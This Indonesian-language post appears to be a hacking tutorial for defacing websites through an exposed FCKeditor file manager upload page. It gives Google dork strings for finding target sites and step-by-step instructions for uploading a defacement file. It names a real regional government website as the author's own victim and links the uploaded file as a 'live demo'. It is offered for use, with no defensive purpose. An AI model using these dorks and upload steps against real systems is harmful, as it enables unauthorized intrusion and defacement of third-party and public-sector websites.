Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Exploit : /editor/filemanager/connectors/test.html
Caranya :
- Copy dork di atas ke kolom google
- Pilih salah satu website dari sekian banyak website untuk di test
- Saya ambil contoh target ane http://www.tanjabbarkab.go.id/html/guru.php?id=profil&kode=53&profil=Pantun%20Daerah
- Ubah /html/guru.php?id=dbguru menjadi /editor/filemanager/connectors/test.html
- Jadi seperti ini http://www.tanjabbarkab.go.id/editor/filemanager/connectors/test.html
- Lalu ubah ASP menjadi PHP, lalu klik Telusuri. pilih script deface yang ingin di test
- Kemudian klik UPLOAD
- Untuk melihat hasil deface kita -> http://www.tanjabbarkab.go.id/userfiles/namafileanda.txt
- Ane mengambil target ini -> http://www.tanjabbarkab.go.id/userfiles/file/rakaganteng.txt
Bagaimana ? mudah bukan ? hehe.
Semoga artikel ini bermanfaat buat akang akang semua ^_^
Live Demo -> http://www.tanjabbarkab.go.id/userfiles/file/rakaganteng.txt